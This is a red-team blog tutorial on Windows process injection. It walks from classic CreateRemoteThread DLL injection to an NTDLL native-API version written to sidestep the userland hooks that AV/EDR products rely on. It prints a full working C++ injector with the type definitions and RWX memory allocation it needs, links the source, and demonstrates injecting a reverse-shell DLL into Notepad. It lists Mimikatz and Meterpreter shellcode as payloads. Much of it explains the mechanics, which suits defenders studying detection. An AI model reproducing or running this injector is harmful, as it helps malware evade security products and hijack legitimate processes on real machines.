Path to Process Injection — Bypass Userland API Hooking

Seemant Bisht
23 min read · Nov 27, 2020


Introduction

My last post discussed processes, process tokens, and token abuse, where we learned how to open a handle to a process and interact with it. This post goes further into process injection and shows how to evade the userland API hooking that AV/EDR products use to detect injection. My main goal in writing it was to understand the injection code end to end, so I have tried to answer the questions most people have when they first study this topic. These are the questions I had in mind before I started reading about process injection:

  • What is process injection?
  • Why do we need to learn about process injection?
  • What do we actually inject?
  • How do we know where to inject?
  • Is the process injection technique different for 32-bit and 64-bit processes?
  • How to perform a basic process injection technique?
  • Can this technique bypass the latest AV/EDR solutions?

There is more to come. I will start with a brief overview of process injection and show how to use the documented Win32 APIs (OpenProcess, VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread) to perform a classic CreateRemoteThread DLL injection. Then we will move down to the Native API functions exported by NTDLL (NtOpenProcess, NtAllocateVirtualMemory, NtWriteVirtualMemory, NtCreateThreadEx), which this post loosely calls Kernel APIs because they are thin user-mode stubs that transition into the kernel. Finally, we will invoke the system calls (syscalls) directly to perform a DLL injection that sidesteps the userland API hooks AV/EDR solutions rely on to detect the technique.

What is process injection?

An injection is an act of administering a liquid, especially a drug, into a person’s body using a needle (usually a hypodermic needle) and a syringe.

Similarly, process injection is the act of introducing code, typically a malicious payload, into a running process using Windows APIs.

According to MITRE | ATT&CK: “Process injection is a method of executing arbitrary code in the address space of a separate live process.”

Why do we need to learn about process injection?

  • It is one of the most widely used post-exploitation techniques in red team assessments and is built into almost every Command & Control framework, such as Cobalt Strike, Mythic C2, Covenant, and Metasploit;
  • Malware uses it widely to stay stealthy while performing malicious operations on the system;
  • Running malicious logic in a legitimate process could help bypass security products (e.g. AV, EDR, DLP, and personal firewall solutions);
  • Attackers want to be stealthy to avoid detection;
  • Running an unrecognized executable is easily detected;
  • Malicious code would rather hide inside a legitimate process;

Is the process injection technique independent of architecture?

It depends on the injection technique. The technique used in this post has a limitation: you can only inject into processes of the same architecture as the calling process. A 32-bit process can only inject into other 32-bit processes, and a 64-bit process can only inject into other 64-bit processes. Cross-architecture injection is out of scope here and will be covered in a future post.
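
Since the technique requires both sides to share an architecture, it can help to check the architecture of an executable image before doing anything else. The sketch below reads the Machine field from a PE header held in a byte buffer. The names image_arch, read_le, and make_minimal_pe are hypothetical helpers written for this illustration, and only the two x86 machine types are recognized; anything else is reported as Unknown.

```cpp
#include <cstddef>
#include <cstdint>
#include <vector>

enum class ImageArch { Unknown, X86, X64 };

// Reads a little-endian unsigned integer of type T at `offset`.
// Returns false when the read would run past the end of the buffer.
template <typename T>
static bool read_le(const std::vector<std::uint8_t>& buf, std::size_t offset, T& out) {
    if (offset > buf.size() || buf.size() - offset < sizeof(T)) return false;
    T value = 0;
    for (std::size_t i = 0; i < sizeof(T); ++i)
        value |= static_cast<T>(static_cast<T>(buf[offset + i]) << (8 * i));
    out = value;
    return true;
}

// Classifies a PE image by the Machine field of its COFF header.
ImageArch image_arch(const std::vector<std::uint8_t>& file) {
    std::uint16_t mz = 0, machine = 0;
    std::uint32_t e_lfanew = 0, signature = 0;
    if (!read_le(file, 0, mz) || mz != 0x5A4D) return ImageArch::Unknown;  // "MZ"
    if (!read_le(file, 0x3C, e_lfanew)) return ImageArch::Unknown;         // offset of the PE header
    const std::size_t pe = static_cast<std::size_t>(e_lfanew);
    if (!read_le(file, pe, signature) || signature != 0x00004550)          // "PE\0\0"
        return ImageArch::Unknown;
    if (!read_le(file, pe + 4, machine)) return ImageArch::Unknown;
    if (machine == 0x014C) return ImageArch::X86;  // IMAGE_FILE_MACHINE_I386
    if (machine == 0x8664) return ImageArch::X64;  // IMAGE_FILE_MACHINE_AMD64
    return ImageArch::Unknown;
}

// Builds a tiny synthetic header for demonstration; it is not a loadable image.
std::vector<std::uint8_t> make_minimal_pe(std::uint16_t machine) {
    std::vector<std::uint8_t> buf(0x40 + 24, 0);  // DOS header + signature + COFF header
    buf[0] = 'M';
    buf[1] = 'Z';
    buf[0x3C] = 0x40;                             // PE header placed right after the DOS header
    buf[0x40] = 'P';
    buf[0x41] = 'E';
    buf[0x44] = static_cast<std::uint8_t>(machine & 0xFF);
    buf[0x45] = static_cast<std::uint8_t>(machine >> 8);
    return buf;
}
```

For example, image_arch(make_minimal_pe(0x8664)) yields ImageArch::X64. In practice the buffer would hold the first bytes of the executable on disk, and the result for the target would be compared with the result for the injector.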

What do we actually inject?

We can inject:

1. An entire portable executable (PE), such as a reverse shell executable, can be injected into another running process;

2. A DLL, such as a Mimikatz or Seatbelt DLL, can be injected into another running process;

3. Shellcode, such as reverse Meterpreter shellcode, can be injected into another running process. Additionally, any DLL can be converted into shellcode using the Shellcode Reflective DLL Injection (sRDI) technique;

4. Return-Oriented Programming (ROP) gadgets can be injected into a PE file, which can in turn be injected into another running process;

How do we know where to inject?

This depends on the injection technique. A process's virtual address space contains several types of memory regions, such as Image, Mapped File, Shareable, Heap, Managed Heap, Stack, and Private Data. Different techniques inject into different regions. In this post, we inject a DLL, which ends up in the Image region of the process.

How to perform a basic process injection technique?

Let’s start with the basic process injection technique using Kernel32 APIs such as OpenProcess, VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread. In this technique, we create a thread in the target process and use it to load the desired DLL or shellcode. The diagram below shows the steps involved.

Steps to understand DLL injection Flow

The steps shown in the diagram above:

  1. The malware process opens a handle to the target process using the OpenProcess function.
  2. Next, GetProcAddress is called with a handle to the kernel32.dll module (not the process handle) to get the address of the LoadLibraryA function. LoadLibraryA loads a library module into the address space of the calling process and returns a handle that can be used with GetProcAddress to get the address of a DLL function. Because kernel32.dll is normally mapped at the same base address in every process of the same architecture during a given boot, the address resolved locally is also valid inside the target. For our DLL to be loaded, we must pass its path to LoadLibraryA, and that path string has to be stored somewhere inside the target process’s address space.
  3. It is highly unlikely that the path to our DLL is already present somewhere in the target process’s address space, which is why we need the next two functions: VirtualAllocEx and WriteProcessMemory. The first function allocates a new memory range inside the process’s address space. That region only needs to be large enough to hold the path of the DLL; the size is rounded up to occupy at least one page. WriteProcessMemory is the function that actually writes the path of our DLL into the victim’s address space.
  4. Finally, CreateRemoteThread is called with LoadLibraryA as the thread start routine and the address of the written path as its parameter, so the new thread loads our DLL inside the victim’s address space.
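
The sizing rule in step 3 is easy to get wrong, so here is a minimal sketch of the arithmetic. It assumes a 4096-byte page, which is the usual page size on x86 and x64 Windows, and the helper names path_bytes and round_up_to_page are hypothetical. Note that the number of bytes to write is the string length plus the terminating NUL; applying sizeof to a char pointer would give the size of the pointer, not of the path.

```cpp
#include <cstddef>
#include <cstring>

// Bytes needed to store a NUL-terminated ANSI path, terminator included.
std::size_t path_bytes(const char* path) {
    return std::strlen(path) + 1;
}

// Rounds `size` up to the next multiple of `page_size`.
// `page_size` must be a power of two (4096 is assumed by default).
std::size_t round_up_to_page(std::size_t size, std::size_t page_size = 4096) {
    return (size + page_size - 1) & ~(page_size - 1);
}
```

With a hypothetical path such as C:\temp\reverse64.dll, path_bytes returns 22, and round_up_to_page(22) returns 4096: the allocation occupies one full page even though only 22 bytes are written into it.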

Note: Terminal Services isolates each terminal session by design. Therefore, CreateRemoteThread fails if the target process is in a different session than the calling process.

Let’s relate the above steps with the code below:

Github: https://github.com/SecurityTimes/Process-Injection/blob/main/RemoteThreadInjection.cpp

Let’s understand the syntax of the various functions used above and their parameters.

  1. OpenProcess:

OpenProcess(): This function allows us to open a handle to the target process.

Syntax:

HANDLE OpenProcess(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId);

The OpenProcess() function accepts three inputs which are explained below:

  • dwDesiredAccess: Access to the process object. This access right is checked against the security descriptor for the process. If the caller has enabled the SeDebugPrivilege privilege, the requested access is granted regardless of the contents of the security descriptor. Here, we have assigned three access rights:

PROCESS_VM_WRITE: Required to write to memory in a process using WriteProcessMemory. Here we use WriteProcessMemory to write the DLL path into the memory allocated by the VirtualAllocEx function.

PROCESS_VM_OPERATION: Required to operate on the address space of a process. Here in our code, we are using the VirtualAllocEx function to reserve, commit, or change the state of a region of memory within the virtual address space of a specified process (target process).

Note: VirtualAllocEx is the extended form of VirtualAlloc. VirtualAllocEx extends the capability of the VirtualAlloc function to reserve memory in a remote process. Through VirtualAlloc, we can reserve memory only in the current process.

PROCESS_CREATE_THREAD: Required to create a thread. Here in our code, it is required by the CreateRemoteThread function.

  • bInheritHandle: If this value is TRUE, processes created by this process will inherit the handle. Otherwise, the processes do not inherit this handle. Here in our code, we do not need inheritance.
  • dwProcessId: The identifier of the local process to be opened. Here in our code, this value is supplied by the user via the command line.
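
The three access rights above are single bits that are OR-ed together into one mask. The sketch below spells that out and decodes a mask back into names, which is handy when reading an access mask in a log. The constant values match the ones in the Windows SDK headers; the k-prefixed names and describe_access are hypothetical, chosen so the snippet does not depend on Windows.h.

```cpp
#include <cstdint>
#include <string>

// Values as defined in the Windows SDK (winnt.h).
constexpr std::uint32_t kProcessCreateThread = 0x0002;  // PROCESS_CREATE_THREAD
constexpr std::uint32_t kProcessVmOperation  = 0x0008;  // PROCESS_VM_OPERATION
constexpr std::uint32_t kProcessVmWrite      = 0x0020;  // PROCESS_VM_WRITE

// The combination requested by the code discussed in this post.
constexpr std::uint32_t kInjectionAccess =
    kProcessVmWrite | kProcessVmOperation | kProcessCreateThread;

// Lists which of the three rights are present in `mask`.
std::string describe_access(std::uint32_t mask) {
    struct Flag { std::uint32_t bit; const char* name; };
    static const Flag flags[] = {
        {kProcessCreateThread, "PROCESS_CREATE_THREAD"},
        {kProcessVmOperation,  "PROCESS_VM_OPERATION"},
        {kProcessVmWrite,      "PROCESS_VM_WRITE"},
    };
    std::string out;
    for (const Flag& f : flags) {
        if (mask & f.bit) {
            if (!out.empty()) out += " | ";
            out += f.name;
        }
    }
    return out.empty() ? std::string("(none of the three)") : out;
}
```

Here kInjectionAccess evaluates to 0x002A, so a handle opened with exactly these rights shows up with that value wherever the granted access is reported.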

2. GetProcAddress:

GetProcAddress(): Retrieves the address of an exported function or variable from the specified dynamic-link library (DLL).

Syntax:

FARPROC GetProcAddress(HMODULE hModule, LPCSTR lpProcName);

The GetProcAddress function takes two inputs:

  • hModule

A handle to the DLL module that contains the function or variable. The LoadLibrary, LoadLibraryEx, LoadPackagedLibrary, or GetModuleHandle function returns this handle. Here in the code, a handle to the kernel32.dll module is obtained which contains the LoadLibraryA function.

Note: The GetProcAddress function does not retrieve addresses from modules that were loaded using the LOAD_LIBRARY_AS_DATAFILE flag.

  • lpProcName

The function or variable name, or the function’s ordinal value. If this parameter is an ordinal value, it must be in the low-order word; the high-order word must be zero. Here in our code, we want the address of the LoadLibraryA function. Therefore, we will pass LoadLibraryA as the function name.

LoadLibraryA loads the specified module (our malicious DLL) into the address space of the calling process. Because the remote thread runs inside the target, the target is the calling process here. The specified module may cause other modules to be loaded.

Syntax:

HMODULE LoadLibraryA(LPCSTR lpLibFileName);

lpLibFileName is the name of the module. There are a few things to note about lpLibFileName:

  • This can be either a library module (a .dll file) or an executable module (a .exe file).
  • If the string specifies a full path, the function searches only that path for the module.
  • If the string specifies a relative path or a module name without a path, the function uses a standard search strategy to find the module.
  • If the function cannot find the module, the function fails. When specifying a path, be sure to use backslashes (\), not forward slashes (/).
  • If the string specifies a module name without a path and the file name extension is omitted, the function appends the default library extension .dll to the module name. To prevent the function from appending .dll to the module name, include a trailing point character (.) in the module name string.
  • If the function succeeds, the return value is a handle to the module.
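
The extension rule in the list above can be modeled in a few lines. This is only a sketch of the documented behavior for bare module names, not the loader's actual implementation, and effective_module_name is a hypothetical helper. Names that contain a path are returned unchanged because the rule quoted above is stated only for names without a path.

```cpp
#include <string>

// Models the documented naming rule for a module name passed without a path:
// append ".dll" when no extension is given, unless the name ends with a point.
std::string effective_module_name(const std::string& name) {
    if (name.empty()) return name;
    const bool has_path = name.find_first_of("\\/") != std::string::npos;
    if (has_path) return name;  // the rule above covers bare module names only
    // Any '.' means either an explicit extension or the trailing point
    // that suppresses the default extension.
    if (name.find('.') != std::string::npos) return name;
    return name + ".dll";
}
```

So "reverse64" becomes "reverse64.dll", while "reverse64.dll" and "reverse64." are left as they are. Passing a full path, as the injection code in this post does, avoids the search strategy altogether.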

3. VirtualAllocEx function:

Reserves, commits, or changes the state of a region of memory within the virtual address space of a specified process. The function initializes the memory it allocates to zero.

Syntax:

LPVOID VirtualAllocEx(
    // The handle to a process. The function allocates memory within the virtual address space of this process. The handle must have the PROCESS_VM_OPERATION access right.
    HANDLE hProcess,
    // The pointer that specifies a desired starting address for the region of pages that you want to allocate. If lpAddress is NULL, the function determines where to allocate the region.
    LPVOID lpAddress,
    // The size of the region of memory to allocate, in bytes. Length of DLL pathname supplied as a command line argument is passed as the value.
    SIZE_T dwSize,
    // The type of memory allocation. We are reserving the memory space and instantly committing it, therefore MEM_COMMIT and MEM_RESERVE values are passed.
    DWORD flAllocationType,
    // The memory protection for the region of pages to be allocated. We need read and write access to the allocated memory for writing the DLL path via WriteProcessMemory.
    DWORD flProtect
);

4. WriteProcessMemory:

Writes data to an area of memory in a specified process.

Syntax:

BOOL WriteProcessMemory(
    // A handle to the process memory to be modified. The handle must have PROCESS_VM_WRITE and PROCESS_VM_OPERATION access to the process.
    HANDLE hProcess,
    // A pointer to the base address in the specified process to which data is written. Before data transfer occurs, the system verifies that all data in the base address and memory of the specified size is accessible for write access, and if it is not accessible, the function fails.
    LPVOID lpBaseAddress,
    // A pointer to the buffer that contains data to be written in the address space of the specified process.
    LPCVOID lpBuffer,
    // The number of bytes to be written to the specified process.
    SIZE_T nSize,
    // A pointer to a variable that receives the number of bytes transferred into the specified process. This parameter is optional. If lpNumberOfBytesWritten is NULL, the parameter is ignored.
    SIZE_T *lpNumberOfBytesWritten
);

5. CreateRemoteThread:

The CreateRemoteThread function creates a thread in the virtual address space of the target process.

Syntax:

HANDLE CreateRemoteThread(
    // Handle to the process where we’ll create a new thread.
    HANDLE hProcess,
    // A pointer to the SECURITY_ATTRIBUTES structure, which specifies the security attributes of the new thread: if NULL, the thread will have default security attributes and the handle cannot be inherited by a child process.
    LPSECURITY_ATTRIBUTES lpThreadAttributes,
    // Initial size of the stack.
    SIZE_T dwStackSize,
    // A pointer to the function that will be executed by the new thread. The function must exist in the remote process.
    LPTHREAD_START_ROUTINE lpStartAddress,
    // A pointer to a variable to be passed to the thread function.
    LPVOID lpParameter,
    // A value that controls the creation of the thread.
    DWORD dwCreationFlags,
    // A pointer to a variable that receives the thread ID.
    LPDWORD lpThreadId
);

We now have a sound understanding of how the code works and what we are trying to achieve. Let’s move on to the practical demo.

Practical Demo:

We will create a 64-bit reverse shell DLL payload, since we will be injecting it into a 64-bit process (Notepad, in our case).

Open a reverse handler listening on port 443 as specified in the payload above.

Open Notepad and find the Process ID via Process Hacker or Windows TaskManager:

Compile the RemoteThreadInjection.cpp and execute the RemoteThreadInjection.exe as shown below:

Shell spawned:

Now, let's find the injected DLL in the Notepad process's module list, where the loaded DLLs are shown.

Note: In the above screenshot, we can see the base address of the reverse64.dll.

To find out in which section of the process our DLL is loaded, we can use VMMAP (a Sysinternals tool that gives you the memory mapping within a process).

Below are the various sections of the Notepad process:

Our reverse64.dll payload is loaded in the image section:

We can see that VirtualAllocEx() allocated a buffer located at 0x7ff997520000. This memory allocation should be within the notepad.exe process space. To confirm, we can open the notepad.exe process in Process Hacker → Properties → Memory and look for the memory region shown below:

Note: An important point to note is that when an executable image (such as EXE or DLL) is normally loaded into the memory, that memory region is given memory protection of PAGE_EXECUTE_WRITECOPY(WCX) by the operating system.
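
To read the protection column in a memory view, it helps to know the underlying constants. The sketch below maps the base protection values to their names and flags plain read-write-execute regions. The numeric values are the ones defined in the Windows SDK; protection_name and is_rwx are hypothetical helpers, and treating RWX as noteworthy is a common heuristic rather than a rule, since an image mapped by the loader starts out as PAGE_EXECUTE_WRITECOPY as noted above.

```cpp
#include <cstdint>
#include <string>

// Returns the name of the base protection value (low byte of the protect field).
// Modifier bits such as PAGE_GUARD (0x100) are masked off first.
std::string protection_name(std::uint32_t protect) {
    switch (protect & 0xFF) {
        case 0x01: return "PAGE_NOACCESS";
        case 0x02: return "PAGE_READONLY";
        case 0x04: return "PAGE_READWRITE";
        case 0x08: return "PAGE_WRITECOPY";
        case 0x10: return "PAGE_EXECUTE";
        case 0x20: return "PAGE_EXECUTE_READ";
        case 0x40: return "PAGE_EXECUTE_READWRITE";
        case 0x80: return "PAGE_EXECUTE_WRITECOPY";
        default:   return "unknown";
    }
}

// True only for PAGE_EXECUTE_READWRITE, the protection an allocation gets
// when it is requested as readable, writable, and executable at once.
bool is_rwx(std::uint32_t protect) {
    return (protect & 0xFF) == 0x40;
}
```

A region reported with protection 0x80 is therefore named PAGE_EXECUTE_WRITECOPY and is not flagged by is_rwx, while a private region at 0x40 is.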

Does this technique bypass AV/EDR solutions?

No. This technique is quite old and does not bypass AV/EDR solutions. This post focuses on making process injection easy to understand, so I have kept it as simple as possible. I will add defense evasion techniques one by one in upcoming posts so that each is easier to follow.

Why doesn’t the above technique bypass AV/EDR solutions?

The API functions we used in the above code (VirtualAllocEx, WriteProcessMemory, CreateRemoteThread) execute in user space, where AV/EDR solutions perform API hooking. API hooking is a technique for instrumenting API calls and modifying their behavior and flow. Hooking Windows APIs is one of the techniques AV/EDR solutions use to determine whether code is malicious.

“Security software will hook specific userspace API functions that are commonly used by malware. For example, a code hook installed on winsock.connect can examine the IP and port of an outgoing network connection and decide whether the connection should be allowed or blocked. A combination of hooks installed on OpenProcess, VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread detect malicious process injection.” — Ref: here

Let’s analyze the API calls in our scenario. We pass the RemoteThreadInjection.exe process and its arguments (PID and DLL path name) to the API Monitor tool, configured with the Data Access and Storage, NT Native, System Services, and Undocumented API filters. With the static import option selected, we can see all the API calls made by our program, as shown in the screenshot below:

If we look at the KERNELBASE module and the APIs it invokes, we can find the lower-level functions that perform the final action by transitioning into the kernel. The userland API calls in our initial code above are translated into these lower-level API calls by the OS libraries.

Now we know that the APIs we call from userland (KERNEL32.DLL) are translated into lower-level APIs that reside in NTDLL.DLL, many of which are undocumented. (Note: You will not find the syntax or prototype for some NTDLL native APIs in the Microsoft documentation. Researchers have made the prototypes publicly available, and we can use those.)

If we can directly use the lower-level APIs resident within NTDLL.DLL, we would be able to stay below the AV/EDR radar (though not completely).

Note: One benefit of the lower-level APIs is that they allow a process to inject a DLL into any other process, irrespective of the session it is running in, as long as the caller has sufficient privileges.

Kernel APIs

RemoteThreadInjection via NTDLL APIs

The functions we will use in our code are undocumented or not declared in the standard user-mode headers. Therefore, we have to declare a function pointer type for each function and define the structures its parameters use. Below is the list of functions we will use in our program:

1. NtOpenProcess

Syntax:

__kernel_entry NTSYSCALLAPI NTSTATUS NtOpenProcess(
    // [out] A pointer to a variable of type HANDLE. The ZwOpenProcess routine writes the process handle to the variable that this parameter points to.
    PHANDLE ProcessHandle,
    // [in] An ACCESS_MASK value that contains the access rights that the caller has requested to the process object.
    ACCESS_MASK DesiredAccess,
    // [in] A pointer to an OBJECT_ATTRIBUTES structure that specifies the attributes to apply to the process object handle. This has to be defined and initialized prior to opening the handle.
    POBJECT_ATTRIBUTES ObjectAttributes,
    // [in, optional] A pointer to a client ID that identifies the thread whose process is to be opened.
    PCLIENT_ID ClientId
);

To use the NtOpenProcess function, we have to declare its function pointer type in our code.

typedef NTSTATUS(NTAPI* _NtOpenProcess)(PHANDLE ProcessHandle, ACCESS_MASK AccessMask, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientID);

Similarly, OBJECT_ATTRIBUTES and CLIENT_ID need to be defined. These structures are defined in the NT kernel header files, so we cannot use them in our code unless we include the respective headers or define them ourselves, as can be seen in the screenshots below:

OBJECT_ATTRIBUTES:

Syntax:

typedef struct _OBJECT_ATTRIBUTES
{
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;

CLIENT_ID:

typedef struct _CLIENT_ID
{
    PVOID UniqueProcess;
    PVOID UniqueThread;
} CLIENT_ID, * PCLIENT_ID;

Before NtOpenProcess returns the handle, the object attributes that apply to the handle need to be initialized. To do this, we define and invoke the InitializeObjectAttributes macro, which initializes the OBJECT_ATTRIBUTES structure that specifies the properties of an object handle to routines that open handles.

VOID InitializeObjectAttributes(
    // A pointer to the OBJECT_ATTRIBUTES structure to initialize.
    [out] POBJECT_ATTRIBUTES p,
    // A pointer to a Unicode string that contains the name of the object for which a handle is to be opened.
    [in] PUNICODE_STRING n,
    // This specifies the flag that is applicable to the object handle.
    [in] ULONG a,
    // A handle to the root object directory for the path name specified in the ObjectName parameter. If ObjectName is a fully qualified object name, RootDirectory is NULL.
    [in] HANDLE r,
    // Specifies a security descriptor to apply to an object when it is created. This parameter is optional. Drivers can specify NULL to accept the default security for the object.
    [in, optional] PSECURITY_DESCRIPTOR s
);

Similarly, the UNICODE_STRING structure needs to be defined, because it is the type of the second input parameter of the InitializeObjectAttributes macro.

Note: Without defining the above structs, the code will not compile. These are the dependencies that have to be defined.

Now, let's see what our NtOpenProcess definitions look like:

typedef struct _CLIENT_ID
{
    PVOID UniqueProcess;
    PVOID UniqueThread;
} CLIENT_ID, * PCLIENT_ID;

typedef struct _UNICODE_STRING
{
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES
{
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;

#define InitializeObjectAttributes(p, n, a, r, s) \
{ \
    (p)->Length = sizeof(OBJECT_ATTRIBUTES); \
    (p)->RootDirectory = r; \
    (p)->Attributes = a; \
    (p)->ObjectName = n; \
    (p)->SecurityDescriptor = s; \
    (p)->SecurityQualityOfService = NULL; \
}

typedef NTSTATUS(NTAPI* _NtOpenProcess)(PHANDLE ProcessHandle, ACCESS_MASK AccessMask, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientID);

2. NtAllocateVirtualMemory

The NtAllocateVirtualMemory routine reserves, commits, or both, a region of pages within the user-mode virtual address space of a specified process.

Syntax:

__kernel_entry NTSYSCALLAPI NTSTATUS NtAllocateVirtualMemory(
    // [in] A handle for the process for which the mapping should be done.
    HANDLE ProcessHandle,
    // [in, out] A pointer to a variable that will receive the base address of the allocated region of pages.
    PVOID *BaseAddress,
    // [in] The number of high-order address bits that must be zero in the base address of the section view.
    ULONG_PTR ZeroBits,
    // [in, out] A pointer to a variable that will receive the actual size, in bytes, of the allocated region of pages.
    PSIZE_T RegionSize,
    // [in] A bitmask containing flags that specify the type of allocation to be performed for the specified region of pages.
    ULONG AllocationType,
    // [in] A bitmask containing page protection flags that specify the protection desired for the committed region of pages.
    ULONG Protect
);

// To use the NtAllocateVirtualMemory function, we have to declare its function pointer type in our code.
// Note: this typedef is looser than the prototype above (PVOID for PVOID*, PULONG for PSIZE_T).
// On 64-bit Windows the RegionSize variable must still be a SIZE_T, because the routine reads and writes a full SIZE_T through that pointer.
typedef NTSTATUS(WINAPI* NAVM)(HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG);

3. NtWriteVirtualMemory

Syntax:

NtWriteVirtualMemory(
    // [in] A handle for the process for which the mapping should be done.
    IN HANDLE ProcessHandle,
    // [in] The base address of the allocated region of pages.
    IN PVOID BaseAddress,
    IN PVOID Buffer,
    IN ULONG NumberOfBytesToWrite,
    OUT PULONG NumberOfBytesWritten OPTIONAL
);

// To use the NtWriteVirtualMemory function, we have to declare its function pointer type in our code.
typedef NTSTATUS(NTAPI* NWVM)(HANDLE, PVOID, PVOID, ULONG, PULONG);

4. NtCreateThreadEx

Syntax:

typedef NTSTATUS (WINAPI *LPFUN_NtCreateThreadEx)(
    OUT PHANDLE hThread,
    IN ACCESS_MASK DesiredAccess,
    IN LPVOID ObjectAttributes,
    IN HANDLE ProcessHandle,
    IN LPTHREAD_START_ROUTINE lpStartAddress,
    IN LPVOID lpParameter,
    IN BOOL CreateSuspended,
    IN ULONG StackZeroBits,
    IN ULONG SizeOfStackCommit,
    IN ULONG SizeOfStackReserve,
    OUT LPVOID lpBytesBuffer
);

// The function pointer type used in our code:
typedef NTSTATUS(NTAPI* NCT)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, HANDLE, PVOID, PVOID, ULONG, SIZE_T, SIZE_T, SIZE_T, PPS_ATTRIBUTE_LIST);

For invoking NtCreateThreadEx, we have to define PPS_ATTRIBUTE_LIST :

typedef struct _PS_ATTRIBUTE
{
    ULONG Attribute;
    SIZE_T Size;
    union
    {
        ULONG Value;
        PVOID ValuePtr;
    } u1;
    PSIZE_T ReturnLength;
} PS_ATTRIBUTE, * PPS_ATTRIBUTE;

typedef struct _PS_ATTRIBUTE_LIST
{
    SIZE_T TotalLength;
    PS_ATTRIBUTE Attributes[1];
} PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST;

So far, we have defined all the dependencies required to call the NT functions. The section below explains how the main code works. There are three ways to perform this technique:

  1. Pass the Process ID and DLL PATH NAME as command-line arguments
  2. Hardcode the DLL PATH NAME inside the attacker’s code.
  3. Hardcode the shellcode in the attacker’s code.

Below is the code for point no. 1:

Code:

int main(int argc, const char* argv[]) {
    // Take two command-line arguments (process ID, DLL path name) as input
    if (argc < 3) {
        printf("Usage: RemoteThreadInjection <PID> <DLL PATH NAME>\n");
        return 0;
    }

    const unsigned char* shellcode = NULL;
    shellcode = (const unsigned char*)argv[2];  // The DLL path name is assigned to the shellcode variable
    LPVOID allocation_start;                    // Receives the base address of the allocated region of pages
    SIZE_T payload_size = strlen(argv[2]) + 1;  // Bytes to write: the path plus its terminating NUL (sizeof(shellcode) would only give the pointer size)
    SIZE_T allocation_size = payload_size;      // Requested region size; the call rounds it up to whole pages
    HANDLE hProcess = NULL, hThread = NULL;     // Handles to the process and the thread
    NTSTATUS status;                            // Stores the status returned by each call; its severity is Success, Informational, Warning, or Error
    OBJECT_ATTRIBUTES objAttr;
    int pid = atoi(argv[1]);                    // Process ID of the target process, taken from the command line
    CLIENT_ID cID;

    // NtOpenProcess uses these object attributes for the handle it returns
    InitializeObjectAttributes(&objAttr, NULL, 0, NULL, NULL);
    cID.UniqueProcess = (PVOID)(ULONG_PTR)pid;
    cID.UniqueThread = 0;

    // Load NTDLL.DLL and resolve the starting address of each function we need
    HINSTANCE hNtdll = LoadLibrary(L"ntdll.dll");
    _NtOpenProcess NtOpenProcess = (_NtOpenProcess)GetProcAddress(hNtdll, "NtOpenProcess");
    NAVM NtAllocateVirtualMemory = (NAVM)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
    NWVM NtWriteVirtualMemory = (NWVM)GetProcAddress(hNtdll, "NtWriteVirtualMemory");
    NCT NtCreateThreadEx = (NCT)GetProcAddress(hNtdll, "NtCreateThreadEx");

    allocation_start = nullptr;

    // Retrieve a handle to the remote process
    status = NtOpenProcess(&hProcess, PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD, &objAttr, &cID);
    if (!hProcess)
        return Error("Failed to open process");

    // Allocate memory in the remote process
    status = NtAllocateVirtualMemory(hProcess, &allocation_start, 0, (PULONG)&allocation_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    // Write the DLL path to the virtual memory of the remote process
    status = NtWriteVirtualMemory(hProcess, allocation_start, (PVOID)shellcode, (ULONG)payload_size, 0);

    // Create the remote thread. LoadLibraryA is the start routine because we are loading a DLL.
    // In the other two scenarios, where we don’t have to load a DLL, we can just pass 'allocation_start' as the start routine.
    status = NtCreateThreadEx(&hThread, GENERIC_EXECUTE, NULL, hProcess,
        (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA"),
        allocation_start, FALSE, 0, 0, 0, nullptr);

    WaitForSingleObject(hThread, 5000);
    VirtualFreeEx(hProcess, allocation_start, 0, MEM_RELEASE);
    CloseHandle(hProcess);
    return 0;
}

Github: https://github.com/SecurityTimes/Process-Injection/blob/main/RemoteThreadInjectionNTDLLFunct_DLLLoading.cpp
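
The code above stores each return value in status but only tests the process handle. Native API calls report failure through the NTSTATUS value itself, so a minimal sketch of how that value is interpreted may be useful. It mirrors the NT_SUCCESS macro from the Windows headers, which treats any non-negative status as success, and decodes the two severity bits mentioned in the comment on the status variable. NtStatus, nt_success, and severity are hypothetical stand-ins so that the snippet does not need Windows headers.

```cpp
#include <cstdint>

using NtStatus = std::int32_t;  // stand-in for NTSTATUS, a signed 32-bit value

constexpr NtStatus kStatusSuccess      = 0;                                    // STATUS_SUCCESS
constexpr NtStatus kStatusAccessDenied = static_cast<NtStatus>(0xC0000022u);   // STATUS_ACCESS_DENIED

// Same test as the NT_SUCCESS macro: success and informational codes are >= 0.
constexpr bool nt_success(NtStatus status) {
    return status >= 0;
}

// The top two bits of an NTSTATUS encode its severity.
enum class Severity { Success = 0, Informational = 1, Warning = 2, Error = 3 };

constexpr Severity severity(NtStatus status) {
    return static_cast<Severity>((static_cast<std::uint32_t>(status) >> 30) & 0x3);
}
```

For instance, nt_success(kStatusAccessDenied) is false and severity(kStatusAccessDenied) is Severity::Error, which is what a caller would see when the target process cannot be opened with the requested rights.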

Practical Demo:

Let’s inject the DLL into the “Notepad++.exe” process. The PID is 19096 as shown below:

Let’s look at our API calls in API Monitor:

Still, we can predict that this will also be detected, because the pattern of calls highlighted above remains visible. That said, the number of overhead calls drops from 270 to 171.

